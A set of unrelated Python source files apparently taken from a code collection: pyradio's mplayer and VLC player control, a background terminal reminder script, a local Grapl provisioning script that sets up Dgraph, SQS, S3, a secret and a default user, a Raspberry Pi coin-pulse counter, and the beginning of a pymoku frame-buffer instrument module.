        config_files.append("/usr/local/etc/mplayer/mplayer.conf")
    elif platform.startswith('win'):
        # Probe the known Windows install locations for mplayer.exe.
        # (Fixed an invalid "\m" escape in the original path literal; the
        # resulting string value is unchanged.)
        if os.path.exists('C:\\mplayer\\mplayer.exe'):
            config_files[0] = 'C:\\mplayer\\mplayer\\config'
        elif os.path.exists(os.path.join(os.getenv('USERPROFILE'), "mplayer", "mplayer.exe")):
            config_files[0] = os.path.join(os.getenv('USERPROFILE'), "mplayer", "mplayer", "config")
        elif os.path.exists(os.path.join(os.getenv('APPDATA'), "pyradio", "mplayer", "mplayer.exe")):
            config_files[0] = os.path.join(os.getenv('APPDATA'), "pyradio", "mplayer", "mplayer", "config")
        else:
            config_files = []
    else:
        # linux, freebsd, etc.
        config_files.append("/etc/mplayer/mplayer.conf")

    def save_volume(self):
        """Persist the current volume through _do_save_volume().

        Windows mplayer builds do not support profiles, so a plain
        "volume=" line is written there.
        """
        if platform.startswith('win'):
            # BUG FIX: an unreachable "return 0" followed this return in
            # the original; removed as dead code.
            return self._do_save_volume("volume={}\r\n")
        return self._do_save_volume("[pyradio]\nvolstep=1\nvolume={}\n")

    def _configHasProfile(self):
        """Check if an mplayer config has a [pyradio] entry / profile.

        Profile example:
            [pyradio]
            volstep=2
            volume=28

        Existing mplayer Windows implementations do not support profiles.
        """
        if platform.startswith('win'):
            return 0
        for i, config_file in enumerate(self.config_files):
            if os.path.exists(config_file):
                with open(config_file) as f:
                    config_string = f.read()
                if "[pyradio]" in config_string:
                    if i == 0:
                        # index 0 is always the user's own config file
                        self.PROFILE_FROM_USER = True
                    return 1
        return 0

    def _buildStartOpts(self, streamUrl, playList=False):
        """Build the mplayer command line for `streamUrl`."""
        http_url = streamUrl.replace('https://', 'http://')
        if playList:
            opts = [self.PLAYER_CMD, "-quiet", "-playlist", http_url]
        else:
            opts = [self.PLAYER_CMD, "-quiet", http_url]
        if self.USE_PROFILE == -1:
            self.USE_PROFILE = self._configHasProfile()
        if self.USE_PROFILE == 1:
            opts.append("-profile")
            opts.append("pyradio")
            if (logger.isEnabledFor(logging.DEBUG)):
                logger.debug("using profile [pyradio]")
        return opts

    def _mute(self):
        """ mute mplayer """
        self._sendCommand("m")

    def pause(self):
        """ pause streaming (if possible) """
        self._sendCommand("p")

    def _stop(self):
        """ exit pyradio (and kill mplayer instance) """
        self._sendCommand("q")

    def _volume_up(self):
        """ increase mplayer's volume """
        self._sendCommand("*")

    def _volume_down(self):
        """ decrease mplayer's volume """
        self._sendCommand("/")

    def _format_title_string(self, title_string):
        """Format mplayer's title output for display.

        Handles both the classic StreamTitle='...' form and the JSON-ish
        START_SONG='{"artist":"...","title":"..."}' form.
        """
        if "StreamTitle='" in title_string:
            tmp = title_string[title_string.find("StreamTitle='"):].replace("StreamTitle='", self.icy_title_prefix)
            ret_string = tmp[:tmp.find("';")]
        else:
            ret_string = title_string
        if '"artist":"' in ret_string:
            # work on format:
            #   ICY Info: START_SONG='{"artist":"Clelia Cafiero","title":"M. Mussorgsky-Quadri di un'esposizione"}';
            # Found on "ClassicaViva Web Radio: Classical"
            ret_string = self.icy_title_prefix + ret_string[ret_string.find('"artist":')+10:].replace('","title":"', ' - ').replace('"}\';', '')
        return self._title_string_format_text_tag(ret_string)

    def _format_volume_string(self, volume_string):
        """ format mplayer's volume """
        return '[' + volume_string[volume_string.find(self.volume_string):].replace(' %','%').replace('ume', '')+'] '
class VlcPlayer(Player):
    """Implementation of Player for VLC"""
    # vlc is started as "cvlc -Irc" so commands can be written to its
    # remote-control (rc) interface via stdin.
    PLAYER_CMD = "cvlc"
    """ items of this tupple are considered icy-title
    and get displayed after first icy-title is received """
    icy_tokkens = ('New Icy-Title=', )
    muted = False
    """ String to denote volume change """
    volume_string = '( audio volume: '
    """ vlc reports volume in values 0..512 """
    actual_volume = -1
    max_volume = 512
    """ When found in station transmission, playback is on """
    _playback_token_tuple = ('Content-Type: audio', )
    def save_volume(self):
        # Volume saving is not implemented for vlc.
        pass
    def _buildStartOpts(self, streamUrl, playList=False):
        """ Builds the options to pass to subprocess."""
        # -vv is required so the volume / icy-title lines we parse appear
        # in vlc's output.
        #opts = [self.PLAYER_CMD, "-Irc", "--quiet", streamUrl]
        opts = [self.PLAYER_CMD, "-Irc", "-vv", streamUrl.replace('https://', 'http://')]
        return opts
    def _mute(self):
        """ mute vlc """
        if self.muted:
            # unmute: restore the volume remembered before muting
            self._sendCommand("volume {}\n".format(self.actual_volume))
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug('VLC unmuted: {0} ({1}%)'.format(self.actual_volume, int(100 * self.actual_volume / self.max_volume)))
        else:
            if self.actual_volume == -1:
                # remember the current volume so unmuting can restore it
                self._get_volume()
            self._sendCommand("volume 0\n")
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug('VLC muted: 0 (0%)')
    def pause(self):
        """ pause streaming (if possible) """
        # NOTE(review): the rc interface is sent "stop", not "pause" —
        # presumably live streams cannot be paused; confirm intent.
        self._sendCommand("stop\n")
    def _stop(self):
        """ exit pyradio (and kill vlc instance) """
        if self.ctrl_c_pressed:
            return
        self._sendCommand("shutdown\n")
    def _volume_up(self):
        """ increase vlc's volume """
        self._sendCommand("volup\n")
    def _volume_down(self):
        """ decrease vlc's volume """
        self._sendCommand("voldown\n")
    def _format_volume_string(self, volume_string):
        """ format vlc's volume """
        # vlc prints e.g. "( audio volume: 256.0 )" (decimal separator is
        # locale dependent); the integer part is scaled 0..512.
        dec_sep = '.' if '.' in volume_string else ','
        self.actual_volume = int(volume_string.split(self.volume_string)[1].split(dec_sep)[0].split()[0])
        return '[Vol: {}%] '.format(int(100 * self.actual_volume / self.max_volume))
    def _format_title_string(self, title_string):
        """ format vlc's title """
        # Everything after the "New Icy-Title=" token is the actual title.
        sp = title_string.split(self.icy_tokkens[0])
        if sp[0] == title_string:
            # token not present: leave the line as is
            ret_string = title_string
        else:
            ret_string = self.icy_title_prefix + sp[1]
        return self._title_string_format_text_tag(ret_string)
    def _is_accepted_input(self, input_string):
        """ vlc input filtering """
        # Only volume reports and http debug lines are processed; the
        # reject filter is currently empty.
        ret = False
        accept_filter = (self.volume_string, "http stream debug: ")
        reject_filter = ()
        for n in accept_filter:
            if n in input_string:
                ret = True
                break
        if ret:
            for n in reject_filter:
                if n in input_string:
                    ret = False
                    break
        return ret
    def _get_volume(self):
        """ get vlc's actual_volume"""
        # "voldown 0" makes vlc print a volume line without changing it;
        # _format_volume_string() captures it from the output thread.
        self.show_volume = False
        self._sendCommand("voldown 0\n")
    def _no_mute_on_stop_playback(self):
        """ make sure vlc does not stop muted """
        if self.ctrl_c_pressed:
            return
        if self.isPlaying():
            if self.actual_volume == -1:
                self._get_volume()
                # NOTE(review): busy-wait until the output thread parses a
                # volume line — spins a CPU core and never ends if vlc
                # stops reporting; confirm this is acceptable.
                while self.actual_volume == -1:
                    pass
            if self.actual_volume == 0:
                # raise volume to 25% so the next start is audible
                self.actual_volume = int(self.max_volume*0.25)
                self._sendCommand('volume {}\n'.format(self.actual_volume))
                if logger.isEnabledFor(logging.DEBUG):
                    logger.debug('Unmuting VLC on exit: {} (25%)'.format(self.actual_volume))
            elif self.muted:
                if self.actual_volume > 0:
                    self._sendCommand('volume {}\n'.format(self.actual_volume))
                    if logger.isEnabledFor(logging.DEBUG):
                        logger.debug('VLC volume restored on exit: {0} ({1}%)'.format(self.actual_volume, int(100 * self.actual_volume / self.max_volume)))
        self.show_volume = True
def probePlayer(requested_player=''):
    """Probe the multimedia players available on the host system.

    With a comma-separated `requested_player` list, only those players are
    tried (in order); otherwise every implemented player is probed.
    Returns the first usable Player subclass, or None.
    """
    if logger.isEnabledFor(logging.INFO):
        logger.info("Probing available multimedia players...")
    available = Player.__subclasses__()
    if logger.isEnabledFor(logging.INFO):
        logger.info("Implemented players: " +
                    ", ".join([player.PLAYER_CMD for player in available]))
    found = None
    if not requested_player:
        for candidate in available:
            found = check_player(candidate)
            if found is not None:
                break
        return found
    for wanted in requested_player.split(','):
        if wanted == 'vlc':
            # the executable for vlc is called cvlc
            wanted = 'cvlc'
        for candidate in available:
            if candidate.PLAYER_CMD == wanted:
                found = check_player(candidate)
                if found is not None:
                    return found
        if found is None:
            if logger.isEnabledFor(logging.INFO):
                logger.info('Requested player "{}" not supported'.format(wanted))
    return found
def check_player(a_player):
    """Return `a_player` if its executable can be launched, else None."""
    try:
        probe = subprocess.Popen([a_player.PLAYER_CMD, "--help"],
                                 stdout=subprocess.PIPE,
                                 stdin=subprocess.PIPE,
                                 shell=False)
        probe.terminate()
    except OSError:
        # executable not installed / not on PATH
        if logger.isEnabledFor(logging.DEBUG):
            logger.debug("{} not supported.".format(str(a_player)))
        return None
    if logger.isEnabledFor(logging.INFO):
        logger.info("{} supported.".format(str(a_player)))
    return a_player
|
kilg.py | import time, os
from multiprocessing import Process
# This is an OS-specific call, it looks confusing but:
# 1. "os.name" is a variable that determines the type of OS
# that Python is currently operating inside of. "nt" = "windows",
# else means another platform, e.g. MAC + LINUX.
# 2. We use the "clear" or "cls" terminal command to
# clear the screen depending on the platform,
# "clear" in mac/linux clears the terminal, and
# "cls" clears the terminal for windows.
# 3. "os.system" calls a system function/ in the terminal
# as if we called it.
def clear():
    """Clear the terminal: "cls" on Windows ("nt"), "clear" elsewhere."""
    command = "cls" if os.name == "nt" else "clear"
    os.system(command)
# The actual "waiting" part of the function, this is
# shipped off into another process behind the scenes
# and only interrupts our execution flow when the function
# finishes and .start() is called on the process that contains
# this target. e.g. Process(target=wait_real, args=[length, texta])
# - calling .start() will start the exec and print ahead when required.
# 1. Sleep for desired time
# 2. Clear the screen after sleep has finished
# 3. Print out the data that is desired to be printed
# 4. Leave the message up for 10 seconds
def wait_real(length, texta):
    """Sleep for `length` seconds, clear the screen, then display the
    reminder text and keep it on screen for 10 seconds.

    Runs inside a child process (see wait_session), so the sleeps never
    block the prompt loop.
    """
    time.sleep(length)
    clear()
    print("ALERT!: {0}".format(texta))
    time.sleep(10)
# Establishing the processes each time the user specifies
# on the infinite loop while loop. Simply starts and targets
# the wait_real function and causes it to start execution and
# the waiting part of the function.
def wait_session(length, texta):
    """Run wait_real(length, texta) in a background process so the main
    input loop keeps running while the reminder counts down."""
    worker = Process(target=wait_real, args=(length, texta))
    worker.start()
# Main loop: prompt for a note and a delay, then hand off to a background
# process that interrupts the terminal once the delay expires.
# NOTE(review): there is no `if __name__ == "__main__":` guard; on Windows,
# multiprocessing's spawn start method re-imports this module and would
# re-enter this loop — confirm target platforms before relying on it.
while True:
    clear()
    # I/O blocking till we go through both of them
    note_text = input("Your note: ")
    delay_seconds = int(input("Length: "))
    wait_session(delay_seconds, note_text)
    print("Setup to remind you in the background!")
|
grapl_provision.py | import json
import os
import logging
import sys
import threading
import time
from hashlib import sha256, pbkdf2_hmac
from typing import List
from uuid import uuid4
import boto3
import botocore
import pydgraph
from grapl_analyzerlib.grapl_client import MasterGraphClient, GraphClient
from grapl_analyzerlib.node_types import (
EdgeRelationship,
PropPrimitive,
PropType,
EdgeT,
)
from grapl_analyzerlib.nodes.base import BaseSchema
from grapl_analyzerlib.prelude import (
AssetSchema,
ProcessSchema,
FileSchema,
IpConnectionSchema,
IpAddressSchema,
IpPortSchema,
NetworkConnectionSchema,
ProcessInboundConnectionSchema,
ProcessOutboundConnectionSchema,
LensSchema,
RiskSchema,
)
from grapl_analyzerlib.schema import Schema
GRAPL_LOG_LEVEL = os.getenv("GRAPL_LOG_LEVEL")
LEVEL = "ERROR" if GRAPL_LOG_LEVEL is None else GRAPL_LOG_LEVEL
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(LEVEL)
LOGGER.addHandler(logging.StreamHandler(stream=sys.stdout))
def create_secret(secretsmanager):
    """Store a fresh random JWT signing secret under the fixed secret id."""
    jwt_secret = str(uuid4())
    secretsmanager.create_secret(
        Name="JWT_SECRET_ID",
        SecretString=jwt_secret,
    )
def set_schema(client, schema) -> None:
    """Apply a dgraph schema string through an alter operation."""
    client.alter(pydgraph.Operation(schema=schema))
def drop_all(client) -> None:
    """Wipe every node, edge and schema entry from the dgraph instance."""
    client.alter(pydgraph.Operation(drop_all=True))
def format_schemas(schema_defs: List["BaseSchema"]) -> str:
    """Join the generated type and schema definitions of every schema into
    one dgraph schema document."""
    types = "\n\n".join(schema.generate_type() for schema in schema_defs)
    schemas = "\n\n".join(schema.generate_schema() for schema in schema_defs)
    sections = [" # Type Definitions", types, "\n # Schema Definitions", schemas]
    return "\n".join(sections)
def query_dgraph_predicate(client: "GraphClient", predicate_name: str):
    """Return the dgraph schema metadata for a single predicate."""
    query = f"""
    schema(pred: {predicate_name}) {{ }}
    """
    read_txn = client.txn(read_only=True)
    try:
        meta = json.loads(read_txn.query(query).json)["schema"][0]
    finally:
        # read-only transactions still need to be discarded
        read_txn.discard()
    return meta
def meta_into_edge(schema, predicate_meta):
    """Map a dgraph predicate meta entry onto an EdgeT; list predicates
    become one-to-many relationships."""
    relationship = (
        EdgeRelationship.OneToMany
        if predicate_meta.get("list")
        else EdgeRelationship.OneToOne
    )
    return EdgeT(type(schema), BaseSchema, relationship)
def meta_into_property(schema, predicate_meta):
    """Map a dgraph predicate meta entry onto a PropType."""
    primitives = {
        "string": PropPrimitive.Str,
        "int": PropPrimitive.Int,
        "bool": PropPrimitive.Bool,
    }
    # Unknown type names yield None, matching the original if-chain.
    primitive = primitives.get(predicate_meta["type"])
    return PropType(
        primitive,
        predicate_meta.get("list"),
        index=predicate_meta.get("index", []),
    )
def meta_into_predicate(schema, predicate_meta):
    """Convert predicate metadata into an edge ("uid" type) or property."""
    try:
        if predicate_meta["type"] == "uid":
            return meta_into_edge(schema, predicate_meta)
        return meta_into_property(schema, predicate_meta)
    except Exception as e:
        LOGGER.error(f"Failed to convert meta to predicate: {predicate_meta} {e}")
        raise e
def query_dgraph_type(client: "GraphClient", type_name: str):
    """Return the schema metadata of every predicate of a dgraph type.

    Gives back an empty list when the type is unknown.
    """
    query = f"""
    schema(type: {type_name}) {{ type }}
    """
    read_txn = client.txn(read_only=True)
    try:
        res = json.loads(read_txn.query(query).json)
    finally:
        read_txn.discard()
    if not res or not res.get("types"):
        return []
    field_names = [field["name"] for field in res["types"][0]["fields"]]
    return [query_dgraph_predicate(client, name) for name in field_names]
def extend_schema(graph_client: GraphClient, schema: "BaseSchema"):
    """Augment `schema` with the properties and edges currently known to
    dgraph for its type."""
    for meta in query_dgraph_type(graph_client, schema.self_type()):
        predicate = meta_into_predicate(schema, meta)
        if isinstance(predicate, PropType):
            schema.add_property(meta["predicate"], predicate)
        else:
            schema.add_edge(meta["predicate"], predicate, "")
def provision_master_graph(
    master_graph_client: GraphClient, schemas: List["BaseSchema"]
) -> None:
    """Push the combined schema document for `schemas` into the master graph."""
    set_schema(master_graph_client, format_schemas(schemas))
def store_schema(table, schema: "Schema"):
    """Persist forward/reverse edge-name pairs of `schema` into dynamodb.

    Each edge is stored twice (f->r and r->f) so either direction can be
    looked up; edges missing either name are skipped.
    """
    for f_edge, (_, r_edge) in schema.get_edges().items():
        if not f_edge or not r_edge:
            continue
        for src, dst in ((f_edge, r_edge), (r_edge, f_edge)):
            table.put_item(Item={"f_edge": src, "r_edge": dst})
        print(f"stored edge mapping: {f_edge} {r_edge}")
def provision_mg(mclient) -> None:
    """Provision the master graph: push all node schemas to dgraph and
    record their edge mappings in the local dynamodb schema table."""
    # drop_all(mclient)
    schemas = (
        AssetSchema(),
        ProcessSchema(),
        FileSchema(),
        IpConnectionSchema(),
        IpAddressSchema(),
        IpPortSchema(),
        NetworkConnectionSchema(),
        ProcessInboundConnectionSchema(),
        ProcessOutboundConnectionSchema(),
        RiskSchema(),
        LensSchema(),
    )
    # Reverse edges must exist on every schema before any is extended.
    for node_schema in schemas:
        node_schema.init_reverse()
    for node_schema in schemas:
        extend_schema(mclient, node_schema)
    provision_master_graph(mclient, schemas)
    dynamodb = boto3.resource(
        "dynamodb",
        region_name="us-west-2",
        endpoint_url="http://dynamodb:8000",
        aws_access_key_id="dummy_cred_aws_access_key_id",
        aws_secret_access_key="dummy_cred_aws_secret_access_key",
    )
    schema_table = dynamodb.Table("local-grapl-grapl_schema_table")
    for node_schema in schemas:
        store_schema(schema_table, node_schema)
# All locally-provisioned resources share this name prefix.
BUCKET_PREFIX = "local-grapl"
# Pipeline services that each get an SQS queue plus a retry queue
# (see provision_sqs).
services = (
    "sysmon-graph-generator",
    "generic-graph-generator",
    "node-identifier",
    "graph-merger",
    "analyzer-dispatcher",
    "analyzer-executor",
    "engagement-creator",
)
# S3 buckets the pipeline reads from / writes to (see bucket_provision_loop).
buckets = (
    BUCKET_PREFIX + "-sysmon-log-bucket",
    BUCKET_PREFIX + "-unid-subgraphs-generated-bucket",
    BUCKET_PREFIX + "-subgraphs-generated-bucket",
    BUCKET_PREFIX + "-subgraphs-merged-bucket",
    BUCKET_PREFIX + "-analyzer-dispatched-bucket",
    BUCKET_PREFIX + "-analyzers-bucket",
    BUCKET_PREFIX + "-analyzer-matched-subgraphs-bucket",
    BUCKET_PREFIX + "-model-plugins-bucket",
)
def provision_sqs(sqs, service_name: str) -> None:
    """Create a service queue plus its retry (dead-letter) queue, wire the
    redrive policy, and purge both for a clean local start."""
    redrive_queue = sqs.create_queue(
        QueueName="grapl-%s-retry-queue" % service_name,
        Attributes={"MessageRetentionPeriod": "86400"},
    )
    redrive_url = redrive_queue["QueueUrl"]
    LOGGER.debug(f"Provisioned {service_name} retry queue at " + redrive_url)
    redrive_arn = sqs.get_queue_attributes(
        QueueUrl=redrive_url, AttributeNames=["QueueArn"]
    )["Attributes"]["QueueArn"]
    # After 10 failed receives a message lands on the retry queue.
    redrive_policy = {
        "deadLetterTargetArn": redrive_arn,
        "maxReceiveCount": "10",
    }
    main_queue = sqs.create_queue(
        QueueName="grapl-%s-queue" % service_name,
    )
    main_url = main_queue["QueueUrl"]
    sqs.set_queue_attributes(
        QueueUrl=main_url,
        Attributes={"RedrivePolicy": json.dumps(redrive_policy)},
    )
    LOGGER.debug(f"Provisioned {service_name} queue at " + main_url)
    sqs.purge_queue(QueueUrl=main_url)
    sqs.purge_queue(QueueUrl=redrive_url)
def provision_bucket(s3, bucket_name: str) -> None:
    # Create a single bucket. Not idempotent by itself: the caller
    # (bucket_provision_loop) treats "BucketAlreadyOwnedByYou" as success.
    s3.create_bucket(Bucket=bucket_name)
    LOGGER.debug(bucket_name)
def bucket_provision_loop() -> None:
    # Retry creating every bucket for up to ~150 iterations, tolerating the
    # local S3 (minio) container coming up slowly. Buckets are removed from
    # `s3_succ` once provisioned; the set name is historical ("succ" = still
    # to succeed).
    s3_succ = {bucket for bucket in buckets}
    s3 = None
    for i in range(0, 150):
        try:
            # Lazily construct the client; reuse it once it connects.
            s3 = s3 or boto3.client(
                "s3",
                endpoint_url="http://s3:9000",
                aws_access_key_id="minioadmin",
                aws_secret_access_key="minioadmin",
            )
        except Exception as e:
            # Only start logging after the first ~10 attempts to avoid noise
            # during normal container start-up.
            # NOTE(review): logging's debug("msg", e) expects %-style args; as
            # written the exception is passed as an unused format argument.
            if i > 10:
                LOGGER.debug("failed to connect to sqs or s3", e)
            continue
        for bucket in buckets:
            if bucket in s3_succ:
                try:
                    provision_bucket(s3, bucket)
                    s3_succ.discard(bucket)
                except Exception as e:
                    # Already existing from a previous run counts as success.
                    if "BucketAlreadyOwnedByYou" in str(e):
                        s3_succ.discard(bucket)
                        continue
                    if i > 10:
                        LOGGER.debug(e)
                    time.sleep(1)
        if not s3_succ:
            return
    raise Exception("Failed to provision s3")
def hash_password(cleartext, salt) -> str:
    """Derive a hex-encoded PBKDF2-HMAC-SHA256 hash of *cleartext*.

    The input bytes are first SHA-256 digested, then stretched with
    512000 PBKDF2 rounds using *salt*.
    """
    digest = sha256(cleartext).digest()
    derived = pbkdf2_hmac("sha256", digest, salt, 512000)
    return derived.hex()
def create_user(username, cleartext):
    # Store a user row (username, salt, hashed password) in the local
    # DynamoDB auth table. The hashing chain must match what the frontend
    # performs client-side before sending credentials.
    assert cleartext
    dynamodb = boto3.resource(
        "dynamodb",
        region_name="us-west-2",
        endpoint_url="http://dynamodb:8000",
        aws_access_key_id="dummy_cred_aws_access_key_id",
        aws_secret_access_key="dummy_cred_aws_secret_access_key",
    )
    table = dynamodb.Table("local-grapl-user_auth_table")
    # We hash before calling 'hashed_password' because the frontend will also
    # perform client-side hashing: append a fixed pepper and the username,
    # then SHA-256 the result 5001 times before the server-side PBKDF2.
    cleartext += "f1dafbdcab924862a198deaa5b6bae29aef7f2a442f841da975f1c515529d254"
    cleartext += username
    hashed = sha256(cleartext.encode("utf8")).hexdigest()
    for i in range(0, 5000):
        hashed = sha256(hashed.encode("utf8")).hexdigest()
    salt = os.urandom(16)
    password = hash_password(hashed.encode("utf8"), salt)
    table.put_item(Item={"username": username, "salt": salt, "password": password})
def sqs_provision_loop() -> None:
    # Retry provisioning every service queue for up to ~150 iterations while
    # the local SQS container comes up. Services are removed from `sqs_succ`
    # once their queues exist.
    sqs_succ = {service for service in services}
    sqs = None
    for i in range(0, 150):
        try:
            # Lazily construct the client; reuse it once it connects.
            sqs = sqs or boto3.client(
                "sqs",
                region_name="us-east-1",
                endpoint_url="http://sqs.us-east-1.amazonaws.com:9324",
                aws_access_key_id="dummy_cred_aws_access_key_id",
                aws_secret_access_key="dummy_cred_aws_secret_access_key",
            )
        except Exception as e:
            # Escalate from debug to error after many failed attempts.
            # NOTE(review): logging's error("msg", e) expects %-style args; the
            # exception is passed as an unused format argument here.
            if i > 50:
                LOGGER.error("failed to connect to sqs or s3", e)
            else:
                LOGGER.debug("failed to connect to sqs or s3", e)
            time.sleep(1)
            continue
        for service in services:
            if service in sqs_succ:
                try:
                    provision_sqs(sqs, service)
                    sqs_succ.discard(service)
                except Exception as e:
                    if i > 10:
                        LOGGER.error(e)
                    time.sleep(1)
        if not sqs_succ:
            return
    raise Exception("Failed to provision sqs")
if __name__ == "__main__":
    # Local-Grapl bootstrap: wipe and re-provision Dgraph, then (in parallel
    # threads) SQS queues and S3 buckets, then Secrets Manager and the default
    # user. Each stage is wrapped in a bounded retry loop because the backing
    # containers come up at unpredictable times.
    time.sleep(5)
    local_dg_provision_client = MasterGraphClient()
    LOGGER.debug("Provisioning graph database")
    # Stage 1: drop any existing graph data.
    for i in range(0, 150):
        try:
            drop_all(local_dg_provision_client)
            break
        except Exception as e:
            time.sleep(2)
            if i > 20:
                LOGGER.error("Failed to drop", e)
    mg_succ = False
    # Stage 2 runs concurrently with stage 3: queues and buckets.
    sqs_t = threading.Thread(target=sqs_provision_loop)
    s3_t = threading.Thread(target=bucket_provision_loop)
    sqs_t.start()
    s3_t.start()
    # Stage 3: provision the master graph schema.
    for i in range(0, 150):
        try:
            if not mg_succ:
                time.sleep(1)
                provision_mg(
                    local_dg_provision_client,
                )
                mg_succ = True
                print("Provisioned mastergraph")
                break
        except Exception as e:
            if i > 10:
                LOGGER.error("mg provision failed with: ", e)
    # Stage 4: create the JWT secret in local Secrets Manager.
    for i in range(0, 150):
        try:
            client = boto3.client(
                service_name="secretsmanager",
                region_name="us-east-1",
                endpoint_url="http://secretsmanager.us-east-1.amazonaws.com:4566",
                aws_access_key_id="dummy_cred_aws_access_key_id",
                aws_secret_access_key="dummy_cred_aws_secret_access_key",
            )
            create_secret(client)
            break
        except botocore.exceptions.ClientError as e:
            # A secret left over from a previous run is fine.
            if "ResourceExistsException" in e.__class__.__name__:
                break
            if i >= 50:
                LOGGER.debug(e)
        except Exception as e:
            if i >= 50:
                LOGGER.error(e)
        time.sleep(1)
    # Stage 5: create the default local user.
    for i in range(0, 150):
        try:
            create_user("grapluser", "graplpassword")
            break
        except Exception as e:
            if i >= 50:
                LOGGER.error(e)
            time.sleep(1)
    # Wait for the queue/bucket threads before declaring success.
    sqs_t.join(timeout=300)
    s3_t.join(timeout=300)
    print("Completed provisioning")
|
CoinManager.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import threading
import logging
import RPi.GPIO as GPIO
class CoinManager(object):
    """Counts pulses from a coin acceptor attached to a GPIO pin.

    Each falling edge on the pin is one pulse; ten pulses equal one unit of
    currency.  A background collector thread banks the accumulated pulses
    into ``cash`` once no pulse has arrived for 0.2 seconds.
    """

    def __init__(self, pin):
        logging.info('Create CoinCounter instance')
        self.cash = 0          # banked total, in tenths of a unit
        self.last_pulse = None  # timestamp of the most recent pulse, or None
        self.pulses = 0        # pulses seen since the last collection
        self.running = False   # True while a collector thread is active
        # Register the coin-acceptor interrupt channel.
        GPIO.setup(pin, GPIO.IN)
        GPIO.add_event_detect(pin, GPIO.FALLING, callback=self.__coinEventHandler__)
        return

    def get_cash(self):
        """Return the banked total converted from pulse-tenths to units."""
        return self.cash / 10.0

    def reset(self):
        """Zero the banked total."""
        self.cash = 0

    def __coinEventHandler__(self, pin):
        # GPIO interrupt callback: record the pulse and lazily spin up the
        # collector thread if one is not already running.
        self.pulses += 1
        self.last_pulse = time.time()
        if not self.running:
            self.running = True
            self.thread = threading.Thread(target=self.__cashCollector__)
            self.thread.start()

    def is_processing(self):
        """True while the collector thread is still waiting for quiet time."""
        return self.running

    def __cashCollector__(self):
        # Poll until the pulse train has been quiet for 0.2 s, then bank the
        # pulses and let the thread exit.
        while self.running:
            quiet = (self.last_pulse is not None
                     and time.time() - self.last_pulse > 0.2)
            if quiet:
                logging.info('Collecting ' + str(self.pulses / 10.0) + " to total of " + str(self.cash / 10.0))
                self.cash = self.cash + self.pulses
                self.pulses = 0
                self.last_pulse = None
                self.running = False
            time.sleep(0.1)
_frame_instrument.py |
# Pull in Python 3 string object on Python 2.
import sys
import logging
import time
import threading
import zmq
from collections import deque
from queue import Queue, Empty
from . import _instrument
from . import _get_autocommit
from . import _input_instrument
from . import UncommittedSettings
from . import NotDeployedException
from . import NoDataException
from . import FrameTimeout
from ._instrument import needs_commit
from ._frame_instrument_data import InstrumentData
log = logging.getLogger(__name__)
class FrameQueue(Queue):
    """A bounded frame buffer that drops the *oldest* frame when full.

    Backed by a ``deque(maxlen=...)`` so that a non-blocking put on a full
    queue silently discards the oldest frame instead of raising ``Full``.
    """

    def put(self, item, block=True, timeout=None):
        # Behaves the same way as default except that instead of raising Full,
        # it just pushes the item on to the deque anyway, throwing away old
        # frames.
        with self.not_full:
            if self.maxsize > 0 and block:
                if timeout is None:
                    while self._qsize() == self.maxsize:
                        self.not_full.wait()
                elif timeout < 0:
                    raise ValueError("'timeout' must be a non-negative number")
                else:
                    # BUG FIX: this previously used Queue._time(), a Python 2
                    # internal that does not exist on Python 3's queue.Queue
                    # and raised AttributeError on the timed-put path.
                    endtime = time.monotonic() + timeout
                    while self._qsize() == self.maxsize:
                        remaining = endtime - time.monotonic()
                        if remaining <= 0.0:
                            # Timed out: fall through and push anyway; the
                            # bounded deque evicts the oldest frame.
                            break
                        self.not_full.wait(remaining)
            self._put(item)
            self.unfinished_tasks += 1
            self.not_empty.notify()

    def get(self, block=True, timeout=None):
        """Get a frame; with ``timeout=None`` keep retrying indefinitely.

        Internally polls in 1-second slices so an indefinite get remains
        interruptible rather than blocking forever in one call.
        """
        item = None
        while True:
            try:
                item = Queue.get(self, block=block, timeout=timeout or 1)
            except Empty:
                if timeout is None:
                    continue
                else:
                    raise
            else:
                return item

    # The default _init for a Queue doesn't actually bound the deque, relying
    # on the put function to bound.
    def _init(self, maxsize):
        self.queue = deque(maxlen=maxsize)
# Revisit: Should this be a Mixin? Are there more instrument classifications
# of this type, recording ability, for example?
class FrameBasedInstrument(_input_instrument.InputInstrument,
                           _instrument.MokuInstrument):
    """Mixin-style base for instruments that stream rendered data frames.

    Frames arrive over a ZMQ SUB socket in a background worker thread and are
    buffered in a :any:`FrameQueue`; ``get_realtime_data`` pops frames while
    ``get_data`` streams the instrument's full-resolution buffer.
    """

    def __init__(self):
        super(FrameBasedInstrument, self).__init__()
        self._buflen = 1
        self._queue = FrameQueue(maxsize=self._buflen)
        self._hb_forced = False
        self.skt, self.mon_skt = None, None
        # Tracks whether the waveformid of frames received so far has wrapped
        self._data_syncd = False

    def _set_frame_class(self, frame_class, **frame_kwargs):
        # Record which InstrumentData subclass (and ctor kwargs) to build for
        # each incoming frame / buffer download.
        self._frame_class = frame_class
        self._frame_kwargs = frame_kwargs

    def _flush(self):
        """ Clear the Frame Buffer.
        This is normally not required as one can simply wait for the
        correctly-generated frames to propagate through using the appropriate
        arguments to :any:`get_data`.
        """
        # Reach into the underlying deque directly, holding the queue's lock.
        with self._queue.mutex:
            self._queue.queue.clear()

    def _set_buffer_length(self, buflen):
        """ Set the internal frame buffer length."""
        # Note: replaces the queue, discarding any frames currently buffered.
        self._buflen = buflen
        self._queue = FrameQueue(maxsize=buflen)

    def _get_buffer_length(self):
        """ Return the current length of the internal frame buffer
        """
        return self._buflen

    def set_defaults(self):
        """ Set instrument default parameters"""
        super(FrameBasedInstrument, self).set_defaults()
        # TODO: All instruments currently run at 10Hz due to kernel timing
        self.framerate = 10

    def get_data(self, timeout=None, wait=True):
        """ Get full-resolution data from the instrument.

        This will pause the instrument and download the entire contents of
        the instrument's internal memory. This may include slightly more data
        than the instrument is set up to record due to rounding of some
        parameters in the instrument.

        All settings must be committed before you call this function. If
        *pymoku.autocommit=True* (the default) then this will always be true,
        otherwise you will need to have called :any:`commit` first.

        The download process may take a second or so to complete. If you
        require high rate data, e.g. for rendering a plot, see
        `get_realtime_data`.

        If the *wait* parameter is true (the default), this function will
        wait for any new settings to be applied before returning. That is, if
        you have set a new timebase (for example), calling this with
        *wait=True* will guarantee that the data returned has this new
        timebase.

        Note that if instrument configuration is changed, a trigger event
        must occur before data captured with that configuration set can become
        available. This can take an arbitrary amount of time. For this reason
